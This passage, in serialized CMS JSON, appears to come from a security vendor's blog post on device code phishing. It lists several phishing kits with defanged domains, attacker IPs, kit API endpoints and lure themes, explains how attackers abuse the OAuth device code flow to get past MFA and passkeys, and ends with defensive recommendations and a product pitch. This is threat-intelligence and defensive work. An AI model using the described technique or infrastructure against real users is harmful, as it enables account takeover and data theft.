sender",{"data":15055,"content":15056,"nodeType":8752},{},[15057,15067],{"data":15058,"content":15059,"nodeType":8766},{},[15060],{"data":15061,"content":15062,"nodeType":879},{},[15063],{"data":15064,"marks":15065,"value":14215,"nodeType":883},{},[15066],{"type":916},{"data":15068,"content":15069,"nodeType":8766},{},[15070],{"data":15071,"content":15072,"nodeType":879},{},[15073],{"data":15074,"marks":15075,"value":15076,"nodeType":883},{},[],"salaryadjustment-2afb52.pmb6fefc52b3f9aa5c2dbf[.]workers.dev",{"data":15078,"content":15082,"nodeType":971},{"target":15079},{"sys":15080},{"id":15081,"type":976,"linkType":977},"6xiTDHStbiJh7LMhjAZcPd",[],{"data":15084,"content":15085,"nodeType":905},{},[],{"data":15087,"content":15088,"nodeType":1036},{},[15089],{"data":15090,"marks":15091,"value":15093,"nodeType":883},{},[15092],{"type":916},"“PAPRIKA”",{"data":15095,"content":15096,"nodeType":8845},{},[15097,15120,15143,15166],{"data":15098,"content":15099,"nodeType":8752},{},[15100,15110],{"data":15101,"content":15102,"nodeType":8766},{},[15103],{"data":15104,"content":15105,"nodeType":879},{},[15106],{"data":15107,"marks":15108,"value":13833,"nodeType":883},{},[15109],{"type":916},{"data":15111,"content":15112,"nodeType":8766},{},[15113],{"data":15114,"content":15115,"nodeType":879},{},[15116],{"data":15117,"marks":15118,"value":15119,"nodeType":883},{},[],"AWS S3 hosting",{"data":15121,"content":15122,"nodeType":8752},{},[15123,15133],{"data":15124,"content":15125,"nodeType":8766},{},[15126],{"data":15127,"content":15128,"nodeType":879},{},[15129],{"data":15130,"marks":15131,"value":13940,"nodeType":883},{},[15132],{"type":916},{"data":15134,"content":15135,"nodeType":8766},{},[15136],{"data":15137,"content":15138,"nodeType":879},{},[15139],{"data":15140,"marks":15141,"value":15142,"nodeType":883},{},[],"POST \u002Fapi\u002Fv1\u002Floader",{"data":15144,"content":15145,"nodeType":8752},{},[15146,15156],{"data":15147,"content":15148,"nodeType":8766},{},[15149],{"data":15150,"content":15151,"nodeType":879},{},[15152],{"data":15153,"marks":15154,"value":13992,"nodeType":883},{},[15155],{"type":916},{"data":15157,"content":15158,"nodeType":8766},{},[15159],{"data":15160,"content":15161,"nodeType":879},{},[15162],{"data":15163,"marks":15164,"value":15165,"nodeType":883},{},[],"MS login clone (\"Sign in to your account\"), \"Office 365\" branding, fake \"Powered by Okta\" footer",{"data":15167,"content":15168,"nodeType":8752},{},[15169,15179],{"data":15170,"content":15171,"nodeType":8766},{},[15172],{"data":15173,"content":15174,"nodeType":879},{},[15175],{"data":15176,"marks":15177,"value":14215,"nodeType":883},{},[15178],{"type":916},{"data":15180,"content":15181,"nodeType":8766},{},[15182],{"data":15183,"content":15184,"nodeType":879},{},[15185],{"data":15186,"marks":15187,"value":15188,"nodeType":883},{},[],"redirect-523346-d95027ec[.]s3.amazonaws.com",{"data":15190,"content":15194,"nodeType":971},{"target":15191},{"sys":15192},{"id":15193,"type":976,"linkType":977},"6WFXqUDzcJHKWSwVIcDZAf",[],{"data":15196,"content":15197,"nodeType":905},{},[],{"data":15199,"content":15200,"nodeType":1036},{},[15201],{"data":15202,"marks":15203,"value":15205,"nodeType":883},{},[15204],{"type":916},"“DCSTATUS”",{"data":15207,"content":15208,"nodeType":8845},{},[15209,15231,15254,15277],{"data":15210,"content":15211,"nodeType":8752},{},[15212,15222],{"data":15213,"content":15214,"nodeType":8766},{},[15215],{"data":15216,"content":15217,"nodeType":879},{},[15218],{"data":15219,"marks":15220,"value":13833,"nodeType":883},{},[15221],{"type":916},{"data":15223,"content":15224,"nodeType":8766},{},[15225],{"data":15226,"content":15227,"nodeType":879},{},[15228],{"data":15229,"marks":15230,"value":14116,"nodeType":883},{},[],{"data":15232,"content":15233,"nodeType":8752},{},[15234,15244],{"data":15235,"content":15236,"nodeType":8766},{},[15237],{"data":15238,"content":15239,"nodeType":879},{},[15240],{"data":15241,"marks":15242,"value":13940,"nodeType":883},{},[15243],{"type":916},{"data":15245,"content":15246,"nodeType":8766},{},[15247],{"data":15248,"content":15249,"nodeType":879},{},[15250],{"data":15251,"marks":15252,"value":15253,"nodeType":883},{},[],"GET \u002Fdc\u002Fstatus\u002F{base64url_sid}",{"data":15255,"content":15256,"nodeType":8752},{},[15257,15267],{"data":15258,"content":15259,"nodeType":8766},{},[15260],{"data":15261,"content":15262,"nodeType":879},{},[15263],{"data":15264,"marks":15265,"value":13992,"nodeType":883},{},[15266],{"type":916},{"data":15268,"content":15269,"nodeType":8766},{},[15270],{"data":15271,"content":15272,"nodeType":879},{},[15273],{"data":15274,"marks":15275,"value":15276,"nodeType":883},{},[],"Generic \"Microsoft 365 - Secure Access\" verification page",{"data":15278,"content":15279,"nodeType":8752},{},[15280,15290],{"data":15281,"content":15282,"nodeType":8766},{},[15283],{"data":15284,"content":15285,"nodeType":879},{},[15286],{"data":15287,"marks":15288,"value":14215,"nodeType":883},{},[15289],{"type":916},{"data":15291,"content":15292,"nodeType":8766},{},[15293],{"data":15294,"content":15295,"nodeType":879},{},[15296],{"data":15297,"marks":15298,"value":15299,"nodeType":883},{},[],"owa[.]apmmacleans[.]ca",{"data":15301,"content":15305,"nodeType":971},{"target":15302},{"sys":15303},{"id":15304,"type":976,"linkType":977},"ugYhHeXY1lQdKooALmrIs",[],{"data":15307,"content":15308,"nodeType":905},{},[],{"data":15310,"content":15311,"nodeType":1036},{},[15312],{"data":15313,"marks":15314,"value":15316,"nodeType":883},{},[15315],{"type":916},"“DOLCE”",{"data":15318,"content":15322,"nodeType":971},{"target":15319},{"sys":15320},{"id":15321,"type":976,"linkType":977},"7TzU6kk01Un45NB0buEz2",[],{"data":15324,"content":15325,"nodeType":8845},{},[15326,15349,15387,15410,15433],{"data":15327,"content":15328,"nodeType":8752},{},[15329,15339],{"data":15330,"content":15331,"nodeType":8766},{},[15332],{"data":15333,"content":15334,"nodeType":879},{},[15335],{"data":15336,"marks":15337,"value":13833,"nodeType":883},{},[15338],{"type":916},{"data":15340,"content":15341,"nodeType":8766},{},[15342],{"data":15343,"content":15344,"nodeType":879},{},[15345],{"data":15346,"marks":15347,"value":15348,"nodeType":883},{},[],"Microsoft PowerApps hosting",{"data":15350,"content":15351,"nodeType":8752},{},[15352,15362],{"data":15353,"content":15354,"nodeType":8766},{},[15355],{"data":15356,"content":15357,"nodeType":879},{},[15358],{"data":15359,"marks":15360,"value":13857,"nodeType":883},{},[15361],{"type":916},{"data":15363,"content":15364,"nodeType":8766},{},[15365,15376],{"data":15366,"content":15367,"nodeType":879},{},[15368,15372],{"data":15369,"marks":15370,"value":14331,"nodeType":883},{},[15371],{"type":916},{"data":15373,"marks":15374,"value":15375,"nodeType":883},{},[],"34.53.159.84 (Google Cloud AS396982)",{"data":15377,"content":15378,"nodeType":879},{},[15379,15383],{"data":15380,"marks":15381,"value":13898,"nodeType":883},{},[15382],{"type":916},{"data":15384,"marks":15385,"value":15386,"nodeType":883},{},[]," Mozilla\u002F5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\u002F537.36 (KHTML, like Gecko) Chrome\u002F123.0.0.0 Safari\u002F537.36",{"data":15388,"content":15389,"nodeType":8752},{},[15390,15400],{"data":15391,"content":15392,"nodeType":8766},{},[15393],{"data":15394,"content":15395,"nodeType":879},{},[15396],{"data":15397,"marks":15398,"value":13940,"nodeType":883},{},[15399],{"type":916},{"data":15401,"content":15402,"nodeType":8766},{},[15403],{"data":15404,"content":15405,"nodeType":879},{},[15406],{"data":15407,"marks":15408,"value":15409,"nodeType":883},{},[],"GET \u002Fapi\u002Fgeneratecode (CloudFront)",{"data":15411,"content":15412,"nodeType":8752},{},[15413,15423],{"data":15414,"content":15415,"nodeType":8766},{},[15416],{"data":15417,"content":15418,"nodeType":879},{},[15419],{"data":15420,"marks":15421,"value":13992,"nodeType":883},{},[15422],{"type":916},{"data":15424,"content":15425,"nodeType":8766},{},[15426],{"data":15427,"content":15428,"nodeType":879},{},[15429],{"data":15430,"marks":15431,"value":15432,"nodeType":883},{},[],"Dolce & Gabbana branded, Italian language, MS account verification",{"data":15434,"content":15435,"nodeType":8752},{},[15436,15446],{"data":15437,"content":15438,"nodeType":8766},{},[15439],{"data":15440,"content":15441,"nodeType":879},{},[15442],{"data":15443,"marks":15444,"value":14215,"nodeType":883},{},[15445],{"type":916},{"data":15447,"content":15448,"nodeType":8766},{},[15449],{"data":15450,"content":15451,"nodeType":879},{},[15452],{"data":15453,"marks":15454,"value":15455,"nodeType":883},{},[],"data-migration-dolcegabbana[.]powerappsportals.com",{"data":15457,"content":15461,"nodeType":971},{"target":15458},{"sys":15459},{"id":15460,"type":976,"linkType":977},"4ayQDvpf5NNOBrj9wZZRiO",[],{"data":15463,"content":15464,"nodeType":905},{},[],{"data":15466,"content":15467,"nodeType":1036},{},[15468],{"data":15469,"marks":15470,"value":15472,"nodeType":883},{},[15471],{"type":916},"Venom",{"data":15474,"content":15475,"nodeType":8845},{},[15476,15499],{"data":15477,"content":15478,"nodeType":8752},{},[15479,15489],{"data":15480,"content":15481,"nodeType":8766},{},[15482],{"data":15483,"content":15484,"nodeType":879},{},[15485],{"data":15486,"marks":15487,"value":13940,"nodeType":883},{},[15488],{"type":916},{"data":15490,"content":15491,"nodeType":8766},{},[15492],{"data":15493,"content":15494,"nodeType":879},{},[15495],{"data":15496,"marks":15497,"value":15498,"nodeType":883},{},[],"POST \u002Ftoken\u002Fapi\u002Fdevice\u002Fstart\nGET \u002Ftoken\u002Fapi\u002Fdevice\u002Fstatus\u002F{sessionId}",{"data":15500,"content":15501,"nodeType":8752},{},[15502,15512],{"data":15503,"content":15504,"nodeType":8766},{},[15505],{"data":15506,"content":15507,"nodeType":879},{},[15508],{"data":15509,"marks":15510,"value":13992,"nodeType":883},{},[15511],{"type":916},{"data":15513,"content":15514,"nodeType":8766},{},[15515],{"data":15516,"content":15517,"nodeType":879},{},[15518],{"data":15519,"marks":15520,"value":15521,"nodeType":883},{},[],"Various: examples include DocuSign \"Verification\" (Microsoft sign-in pretext); DHL \"Delivery Checkpoint\" package shipment pretext",{"data":15523,"content":15527,"nodeType":971},{"target":15524},{"sys":15525},{"id":15526,"type":976,"linkType":977},"79C3fces0hgTdf3G68cIrf",[],{"data":15529,"content":15530,"nodeType":905},{},[],{"data":15532,"content":15533,"nodeType":1036},{},[15534],{"data":15535,"marks":15536,"value":15538,"nodeType":883},{},[15537],{"type":916},"Tycoon2FA",{"data":15540,"content":15541,"nodeType":8845},{},[15542,15572,15609,15632,15655],{"data":15543,"content":15544,"nodeType":8752},{},[15545,15555],{"data":15546,"content":15547,"nodeType":8766},{},[15548],{"data":15549,"content":15550,"nodeType":879},{},[15551],{"data":15552,"marks":15553,"value":13833,"nodeType":883},{},[15554],{"type":916},{"data":15556,"content":15557,"nodeType":8766},{},[15558,15565],{"data":15559,"content":15560,"nodeType":879},{},[15561],{"data":15562,"marks":15563,"value":15564,"nodeType":883},{},[],"Github.io and Cloudflare Workers (workers.dev) hosting",{"data":15566,"content":15567,"nodeType":879},{},[15568],{"data":15569,"marks":15570,"value":15571,"nodeType":883},{},[],"Compromised-site landing pages and CF Workers (*.workers.dev) used as frontends; victim email passed in URL as last path segment ($base64) or ?acct\u002F?encoded query",{"data":15573,"content":15574,"nodeType":8752},{},[15575,15585],{"data":15576,"content":15577,"nodeType":8766},{},[15578],{"data":15579,"content":15580,"nodeType":879},{},[15581],{"data":15582,"marks":15583,"value":13857,"nodeType":883},{},[15584],{"type":916},{"data":15586,"content":15587,"nodeType":8766},{},[15588,15599],{"data":15589,"content":15590,"nodeType":879},{},[15591,15595],{"data":15592,"marks":15593,"value":14331,"nodeType":883},{},[15594],{"type":916},{"data":15596,"marks":15597,"value":15598,"nodeType":883},{},[],"47.253.5.88 (Alibaba Cloud)",{"data":15600,"content":15601,"nodeType":879},{},[15602,15606],{"data":15603,"marks":15604,"value":13898,"nodeType":883},{},[15605],{"type":916},{"data":15607,"marks":15608,"value":14155,"nodeType":883},{},[],{"data":15610,"content":15611,"nodeType":8752},{},[15612,15622],{"data":15613,"content":15614,"nodeType":8766},{},[15615],{"data":15616,"content":15617,"nodeType":879},{},[15618],{"data":15619,"marks":15620,"value":13940,"nodeType":883},{},[15621],{"type":916},{"data":15623,"content":15624,"nodeType":8766},{},[15625],{"data":15626,"content":15627,"nodeType":879},{},[15628],{"data":15629,"marks":15630,"value":15631,"nodeType":883},{},[],"GET \u002Fapi\u002Fsession\u002F{UUIDv4} polled with header X-API-Key: \u003Cprefix>_\u003C64-hex> (key materialised at runtime via atob(window.__cyb3r.k)) \nPOST \u002Fapi\u002Fdevice-code with body {\"prt_foci_session_id\": \"\u003CUUID>\"} (second-stage code retrieval after initial session error)",{"data":15633,"content":15634,"nodeType":8752},{},[15635,15645],{"data":15636,"content":15637,"nodeType":8766},{},[15638],{"data":15639,"content":15640,"nodeType":879},{},[15641],{"data":15642,"marks":15643,"value":13992,"nodeType":883},{},[15644],{"type":916},{"data":15646,"content":15647,"nodeType":8766},{},[15648],{"data":15649,"content":15650,"nodeType":879},{},[15651],{"data":15652,"marks":15653,"value":15654,"nodeType":883},{},[],"Various: SharePoint \"Remittance Advice\"; Microsoft 365 generic sign-in; Microsoft 365 Voicemail (.mp3 attachment); OneDrive \"Shared file\"; German \"Sicheres Dokumentenportal\" PDF lure",{"data":15656,"content":15657,"nodeType":8752},{},[15658,15668],{"data":15659,"content":15660,"nodeType":8766},{},[15661],{"data":15662,"content":15663,"nodeType":879},{},[15664],{"data":15665,"marks":15666,"value":14215,"nodeType":883},{},[15667],{"type":916},{"data":15669,"content":15670,"nodeType":8766},{},[15671],{"data":15672,"content":15673,"nodeType":879},{},[15674],{"data":15675,"marks":15676,"value":15677,"nodeType":883},{},[],"afriqbeauglobal[.]com\u002Fhomepage\u002Findex[.]html",{"data":15679,"content":15682,"nodeType":971},{"target":15680},{"sys":15681},{"id":2483,"type":976,"linkType":977},[],{"data":15684,"content":15685,"nodeType":905},{},[],{"data":15687,"content":15688,"nodeType":1036},{},[15689],{"data":15690,"marks":15691,"value":15693,"nodeType":883},{},[15692],{"type":916},"\"CYB3R\"",{"data":15695,"content":15696,"nodeType":8845},{},[15697,15720,15758,15780,15803],{"data":15698,"content":15699,"nodeType":8752},{},[15700,15710],{"data":15701,"content":15702,"nodeType":8766},{},[15703],{"data":15704,"content":15705,"nodeType":879},{},[15706],{"data":15707,"marks":15708,"value":13833,"nodeType":883},{},[15709],{"type":916},{"data":15711,"content":15712,"nodeType":8766},{},[15713],{"data":15714,"content":15715,"nodeType":879},{},[15716],{"data":15717,"marks":15718,"value":15719,"nodeType":883},{},[],"Cloudflare Workers (workers.dev) hosting",{"data":15721,"content":15722,"nodeType":8752},{},[15723,15733],{"data":15724,"content":15725,"nodeType":8766},{},[15726],{"data":15727,"content":15728,"nodeType":879},{},[15729],{"data":15730,"marks":15731,"value":13857,"nodeType":883},{},[15732],{"type":916},{"data":15734,"content":15735,"nodeType":8766},{},[15736,15747],{"data":15737,"content":15738,"nodeType":879},{},[15739,15743],{"data":15740,"marks":15741,"value":14331,"nodeType":883},{},[15742],{"type":916},{"data":15744,"marks":15745,"value":15746,"nodeType":883},{},[],"2400:8d60:2::1:c116:843e (Evoxt VPS)",{"data":15748,"content":15749,"nodeType":879},{},[15750,15754],{"data":15751,"marks":15752,"value":13898,"nodeType":883},{},[15753],{"type":916},{"data":15755,"marks":15756,"value":15757,"nodeType":883},{},[]," axios\u002F1.13.6",{"data":15759,"content":15760,"nodeType":8752},{},[15761,15771],{"data":15762,"content":15763,"nodeType":8766},{},[15764],{"data":15765,"content":15766,"nodeType":879},{},[15767],{"data":15768,"marks":15769,"value":13940,"nodeType":883},{},[15770],{"type":916},{"data":15772,"content":15773,"nodeType":8766},{},[15774],{"data":15775,"content":15776,"nodeType":879},{},[15777],{"data":15778,"marks":15779,"value":15631,"nodeType":883},{},[],{"data":15781,"content":15782,"nodeType":8752},{},[15783,15793],{"data":15784,"content":15785,"nodeType":8766},{},[15786],{"data":15787,"content":15788,"nodeType":879},{},[15789],{"data":15790,"marks":15791,"value":13992,"nodeType":883},{},[15792],{"type":916},{"data":15794,"content":15795,"nodeType":8766},{},[15796],{"data":15797,"content":15798,"nodeType":879},{},[15799],{"data":15800,"marks":15801,"value":15802,"nodeType":883},{},[],"DocuSign in Spanish (\"Documento Firmar — COTIZACIÓN\u002FESTIMACIÓN.pdf\", \"Complete su firma\", \"Verifique su identidad\", \"Continuar a Microsoft\").",{"data":15804,"content":15805,"nodeType":8752},{},[15806,15816],{"data":15807,"content":15808,"nodeType":8766},{},[15809],{"data":15810,"content":15811,"nodeType":879},{},[15812],{"data":15813,"marks":15814,"value":14215,"nodeType":883},{},[15815],{"type":916},{"data":15817,"content":15818,"nodeType":8766},{},[15819],{"data":15820,"content":15821,"nodeType":879},{},[15822],{"data":15823,"marks":15824,"value":15825,"nodeType":883},{},[],"muzagestion[.]secure-share[.]workers.dev",{"data":15827,"content":15831,"nodeType":971},{"target":15828},{"sys":15829},{"id":15830,"type":976,"linkType":977},"5EU0QNteiQcYybKG1W1cS3",[],{"data":15833,"content":15834,"nodeType":905},{},[],{"data":15836,"content":15837,"nodeType":909},{},[15838],{"data":15839,"marks":15840,"value":15842,"nodeType":883},{},[15841],{"type":916},"Device code phishing under the hood",{"data":15844,"content":15845,"nodeType":879},{},[15846,15850],{"data":15847,"marks":15848,"value":15849,"nodeType":883},{},[],"The attacker POSTs to the authorization server's device authorization endpoint with its client_id (i.e. an application ID) and requested scopes or resources. The server responds with a device_code (used for polling), a user_code, a verification_uri, an expires_in value, and a polling interval. The user visits the URL, enters the code and approves the request. Meanwhile, the device polls the token endpoint. Once approved, the server returns an access token, a refresh token (if offline_access was requested), and an ID token (if openid was included). ",{"data":15851,"marks":15852,"value":15854,"nodeType":883},{},[15853],{"type":916},"The attacker now has API access to the victim's account. ",{"data":15856,"content":15857,"nodeType":879},{},[15858],{"data":15859,"marks":15860,"value":15861,"nodeType":883},{},[],"Broadly, this gives the attacker a comparable level of control to a “normal” phishing attack (with conditions based on the scopes granted and specific app being targeted) while API access grants additional capabilities beyond standard browser sessions. When combined with other techniques, this access can be exchanged to open normal browser app sessions and access SSO connected apps.",{"data":15863,"content":15867,"nodeType":971},{"target":15864},{"sys":15865},{"id":15866,"type":976,"linkType":977},"4WtQR2xsE236yoyhSXj58Z",[],{"data":15869,"content":15873,"nodeType":971},{"target":15870},{"sys":15871},{"id":15872,"type":976,"linkType":977},"1x7Lip7JdY2xlHKKurT7qJ",[],{"data":15875,"content":15876,"nodeType":879},{},[15877],{"data":15878,"marks":15879,"value":15880,"nodeType":883},{},[],"At this point, you can achieve a number of objectives both inside the app ecosystem and across SSO connected apps — e.g. data theft, disruption, and ultimately extortion.",{"data":15882,"content":15883,"nodeType":879},{},[15884,15888,15893,15897],{"data":15885,"marks":15886,"value":15887,"nodeType":883},{},[],"Critically, the initial request to generate a device code is typically ",{"data":15889,"marks":15890,"value":15892,"nodeType":883},{},[15891],{"type":916},"unauthenticated",{"data":15894,"marks":15895,"value":15896,"nodeType":883},{},[]," across all providers — ",{"data":15898,"marks":15899,"value":15901,"nodeType":883},{},[15900],{"type":916},"anyone can generate one, from any machine, without proving any relationship to the target organization.",{"data":15903,"content":15904,"nodeType":879},{},[15905,15909,15914],{"data":15906,"marks":15907,"value":15908,"nodeType":883},{},[],"So, the attacker has to deliver a set of instructions via a phishing channel (e.g. email, social media DM, corp IM platform, and so on) with a device code that they have generated. The victim then enters this code on the ",{"data":15910,"marks":15911,"value":15913,"nodeType":883},{},[15912],{"type":916},"legitimate device code login page",{"data":15915,"marks":15916,"value":15917,"nodeType":883},{},[]," for that app and issues the tokens to the attacker.",{"data":15919,"content":15923,"nodeType":971},{"target":15920},{"sys":15921},{"id":15922,"type":976,"linkType":977},"1txUYuQjH9FlbDGTo8AbZB",[],{"data":15925,"content":15926,"nodeType":905},{},[],{"data":15928,"content":15929,"nodeType":909},{},[15930],{"data":15931,"marks":15932,"value":15934,"nodeType":883},{},[15933],{"type":916},"Why device code phishing is so dangerous",{"data":15936,"content":15937,"nodeType":1036},{},[15938],{"data":15939,"marks":15940,"value":15942,"nodeType":883},{},[15941],{"type":916},"Device code phishing bypasses authentication controls (including passkeys)",{"data":15944,"content":15945,"nodeType":879},{},[15946,15950,15955,15959],{"data":15947,"marks":15948,"value":15949,"nodeType":883},{},[],"A device code phishing attack ",{"data":15951,"marks":15952,"value":15954,"nodeType":883},{},[15953],{"type":916},"cannot be prevented with authentication controls",{"data":15956,"marks":15957,"value":15958,"nodeType":883},{},[],". This includes all forms of MFA and ",{"data":15960,"marks":15961,"value":15963,"nodeType":883},{},[15962],{"type":916},"even “phishing-resistant” authentication methods such as passkeys. ",{"data":15965,"content":15966,"nodeType":879},{},[15967,15972,15976,15981],{"data":15968,"marks":15969,"value":15971,"nodeType":883},{},[15970],{"type":916},"The device code authorization is effectively performed post-authentication. ",{"data":15973,"marks":15974,"value":15975,"nodeType":883},{},[],"If you already have an active session in your browser, entering the device code and selecting your account from a drop-down menu is all that's needed. ",{"data":15977,"marks":15978,"value":15980,"nodeType":883},{},[15979],{"type":916},"No password or MFA required. ",{"data":15982,"marks":15983,"value":15984,"nodeType":883},{},[],"You can see an example in the video below.",{"data":15986,"content":15989,"nodeType":971},{"target":15987},{"sys":15988},{"id":14918,"type":976,"linkType":977},[],{"data":15991,"content":15992,"nodeType":879},{},[15993],{"data":15994,"marks":15995,"value":15996,"nodeType":883},{},[],"Even if you do have to sign in again (because you're not already signed in for some reason), the attack still works because it isn't targeting the login — it's targeting the authorization layer instead.",{"data":15998,"content":15999,"nodeType":879},{},[16000],{"data":16001,"marks":16002,"value":16003,"nodeType":883},{},[],"This is what makes device code phishing different to other standard phishing methods like AiTM phishing (and arguably even more effective in environments with strict identity control enforcement). ",{"data":16005,"content":16006,"nodeType":1036},{},[16007],{"data":16008,"marks":16009,"value":16011,"nodeType":883},{},[16010],{"type":916},"Device code logins are a feature, not a vulnerability, making attacks difficult to block",{"data":16013,"content":16014,"nodeType":879},{},[16015],{"data":16016,"marks":16017,"value":16018,"nodeType":883},{},[],"Device code authorization is a legitimate mechanism regularly used in enterprise environments, particularly for CLI logins. Tools like Azure CLI, GitHub CLI, and AWS CLI all use (or have used) the device code flow as a primary or fallback authentication method. This creates a dual problem for defenders. ",{"data":16020,"content":16021,"nodeType":879},{},[16022],{"data":16023,"marks":16024,"value":16025,"nodeType":883},{},[],"First, the phishing attack happens entirely on a legitimate site — there's no fake login page, no malicious payload to scan for, and the URL in the browser is genuine. Since there's no traditional phishing content being delivered, these attacks are more resistant to detection by email and network security tools.",{"data":16027,"content":16028,"nodeType":879},{},[16029],{"data":16030,"marks":16031,"value":16032,"nodeType":883},{},[],"Second, the widespread legitimate use of device code flow — particularly among developers and technical users — normalizes the experience of entering device codes. A phishing lure asking them to do the same thing is indistinguishable from a legitimate IT request. And for non-technical users, this experience isn't much different to, for example, entering a code sent via email or authenticator app. ",{"data":16034,"content":16035,"nodeType":1036},{},[16036],{"data":16037,"marks":16038,"value":16040,"nodeType":883},{},[16039],{"type":916},"Multiple apps are vulnerable, with different risk profiles",{"data":16042,"content":16043,"nodeType":879},{},[16044],{"data":16045,"marks":16046,"value":16047,"nodeType":883},{},[],"Various apps implement the device code flow, each with different levels of control and default security, but the risk is not uniform across platforms. ",{"data":16049,"content":16050,"nodeType":1531},{},[16051,16066,16080],{"data":16052,"content":16053,"nodeType":1535},{},[16054],{"data":16055,"content":16056,"nodeType":879},{},[16057,16062],{"data":16058,"marks":16059,"value":16061,"nodeType":883},{},[16060],{"type":916},"Google Workspace ",{"data":16063,"marks":16064,"value":16065,"nodeType":883},{},[],"is a significantly lower-risk target because Google explicitly limits which scopes are available to the device code flow — Gmail, Calendar, and most Workspace APIs are simply unavailable through this mechanism. ",{"data":16067,"content":16068,"nodeType":1535},{},[16069],{"data":16070,"content":16071,"nodeType":879},{},[16072,16076],{"data":16073,"marks":16074,"value":13539,"nodeType":883},{},[16075],{"type":916},{"data":16077,"marks":16078,"value":16079,"nodeType":883},{},[]," offers the broadest attack surface due to unrestricted scopes, reusable first-party client IDs, and the FOCI\u002FPRT escalation paths. ",{"data":16081,"content":16082,"nodeType":1535},{},[16083],{"data":16084,"content":16085,"nodeType":879},{},[16086,16090,16094],{"data":16087,"marks":16088,"value":16089,"nodeType":883},{},[],"Apps like ",{"data":16091,"marks":16092,"value":7804,"nodeType":883},{},[16093],{"type":916},{"data":16095,"marks":16096,"value":16097,"nodeType":883},{},[]," sit in between — broad scopes are available (including full repository access), but the attacker must control their own OAuth app and the victim sees an explicit consent screen. ",{"data":16099,"content":16103,"nodeType":971},{"target":16100},{"sys":16101},{"id":16102,"type":976,"linkType":977},"ejNSC76jge1p1zzz9wwiG",[],{"data":16105,"content":16106,"nodeType":905},{},[],{"data":16108,"content":16109,"nodeType":909},{},[16110],{"data":16111,"marks":16112,"value":16114,"nodeType":883},{},[16113],{"type":916},"Security recommendations",{"data":16116,"content":16117,"nodeType":879},{},[16118],{"data":16119,"marks":16120,"value":16121,"nodeType":883},{},[],"Security teams need to consider the risk posed by device code phishing across multiple apps where device code authorization grants are common, particularly for developers and technical users. ",{"data":16123,"content":16124,"nodeType":879},{},[16125],{"data":16126,"marks":16127,"value":16128,"nodeType":883},{},[],"In an ideal world, you would simply block device code logins. But this can’t be done without causing serious disruption in some environments, while some apps simply don’t provide the tools required to do so. For example, device code is the default CLI sign-in method for GitHub. Developer-heavy organizations are likely to encounter higher levels of legitimate use.",{"data":16130,"content":16131,"nodeType":879},{},[16132,16136,16145,16149,16154,16158,16163,16167,16172],{"data":16133,"marks":16134,"value":16135,"nodeType":883},{},[],"Microsoft arguably offers the strongest control options (other than Google, who negate it right out of the gate), though they do require a fair amount of work. ",{"data":16137,"content":16139,"nodeType":940},{"uri":16138},"https:\u002F\u002Ftechcommunity.microsoft.com\u002Fblog\u002Fmicrosoft-entra-blog\u002Fnew-microsoft-managed-policies-to-raise-your-identity-security-posture\u002F4286758",[16140],{"data":16141,"marks":16142,"value":16144,"nodeType":883},{},[16143],{"type":948},"Microsoft now explicitly recommends",{"data":16146,"marks":16147,"value":16148,"nodeType":883},{},[]," blocking device code flow for tenants that haven't used it in the past 25 days. Their guidance is to create a custom CA policy: target relevant users, set the ",{"data":16150,"marks":16151,"value":16153,"nodeType":883},{},[16152],{"type":916},"Authentication Flows",{"data":16155,"marks":16156,"value":16157,"nodeType":883},{},[]," condition to block ",{"data":16159,"marks":16160,"value":16162,"nodeType":883},{},[16161],{"type":916},"Device Code Flow",{"data":16164,"marks":16165,"value":16166,"nodeType":883},{},[],", and set the grant control to ",{"data":16168,"marks":16169,"value":16171,"nodeType":883},{},[16170],{"type":916},"Block Access",{"data":16173,"marks":16174,"value":16175,"nodeType":883},{},[],". Deploy in report-only mode first to identify any legitimate device code usage, then enforce with narrow exceptions.",{"data":16177,"content":16181,"nodeType":971},{"target":16178},{"sys":16179},{"id":16180,"type":976,"linkType":977},"mQIj2o9xRzkZYKNmanB25",[],{"data":16183,"content":16184,"nodeType":879},{},[16185],{"data":16186,"marks":16187,"value":16188,"nodeType":883},{},[],"For other apps, you’re mainly limited to monitoring and response. Ensuring you’re getting authentication logs for these apps is vital, and searching for unusual access patterns (e.g. unusual login protocols, having different IPs for the authorization grant and subsequent account activity). ",{"data":16190,"content":16191,"nodeType":905},{},[],{"data":16193,"content":16194,"nodeType":909},{},[16195],{"data":16196,"marks":16197,"value":16199,"nodeType":883},{},[16198],{"type":916},"How Push Security can help",{"data":16201,"content":16202,"nodeType":879},{},[16203],{"data":16204,"marks":16205,"value":16206,"nodeType":883},{},[],"Push customers can use our browser-based capabilities to overcome the limitations of app-level controls and detect, intercept, and shut down attacks in real time. ",{"data":16208,"content":16209,"nodeType":879},{},[16210],{"data":16211,"marks":16212,"value":16213,"nodeType":883},{},[],"Our research team is already tracking multiple device code phishing campaigns and toolkits, including the EvilTokens kit. Blocking controls are already in place to prevent customers from interacting with malicious pages that match our detections for these new toolkits, ensuring that these pages can be identified and blocked in real time regardless of the infrastructure. ",{"data":16215,"content":16216,"nodeType":879},{},[16217,16221,16230],{"data":16218,"marks":16219,"value":16220,"nodeType":883},{},[],"Using Push you can also ",{"data":16222,"content":16224,"nodeType":940},{"uri":16223},"https:\u002F\u002Fpushsecurity.com\u002Fhelp\u002Fcan-i-use-push-to-help-protect-against-device-code-phishing-scenarios\u002F",[16225],{"data":16226,"marks":16227,"value":16229,"nodeType":883},{},[16228],{"type":948},"configure in-browser warnings",{"data":16231,"marks":16232,"value":16233,"nodeType":883},{},[]," whenever a user accesses a URL used for device code logins. This provides universal, last-mile protection against even ‘zero-day’ device code phishing attacks using previously unidentified toolkits.  ",{"data":16235,"content":16239,"nodeType":971},{"target":16236},{"sys":16237},{"id":16238,"type":976,"linkType":977},"3JsbGaOKSS3INzBUJpoh1W",[],{"data":16241,"content":16242,"nodeType":879},{},[16243],{"data":16244,"marks":16245,"value":16246,"nodeType":883},{},[],"When a user visits those URLs, Push will also emit a webhook event that the banner was shown and acknowledged. If a user opts to proceed, you can treat this as a high-fidelity alert for your security team to investigate, providing app-agnostic telemetry that may not already be provided in your logs from that particular vendor. You can also simply use Push to block users from accessing device login pages if you’re confident that disruption won’t be caused. ",{"data":16248,"content":16249,"nodeType":1036},{},[16250],{"data":16251,"marks":16252,"value":12611,"nodeType":883},{},[16253],{"type":916},{"data":16255,"content":16256,"nodeType":879},{},[16257],{"data":16258,"marks":16259,"value":16260,"nodeType":883},{},[],"Push Security's browser-based security platform detects and blocks browser-based attacks like AiTM phishing, credential stuffing, malicious browser extensions, ClickFix, and session hijacking. You don't need to wait 